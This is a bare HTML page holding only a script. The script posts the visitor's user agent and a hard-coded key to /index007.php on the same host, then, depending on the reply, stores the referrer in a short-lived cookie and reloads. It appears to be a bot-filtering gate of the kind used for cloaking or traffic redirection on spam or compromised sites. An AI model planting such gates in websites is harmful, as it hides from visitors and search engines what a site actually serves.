<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
 <head>
   <script type="text/javascript">
     (function() {
       var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject('Microsoft.XMLHTTP');

       xhr.onreadystatechange = function() {
         if (xhr.readyState == 4 && xhr.responseText == 1) {
           var date = new Date();
           date.setTime(date.getTime() + 2000);
           document.cookie = 'referrer=' + encodeURIComponent(document.referrer) + '; expires=' + date.toGMTString();
           window.location = window.location.href;
         }
       };

       var url = location.protocol + '//' + location.hostname + '/index007.php';
       var data = 'ua=' + encodeURIComponent(navigator.userAgent) + '&sec=' + encodeURIComponent('secret22key') + '&rnd=' + Math.random();

       xhr.open('POST', url, true);
       xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
       xhr.send(data);
     })();
   </script>
 </head>
 <body></body>
</html>
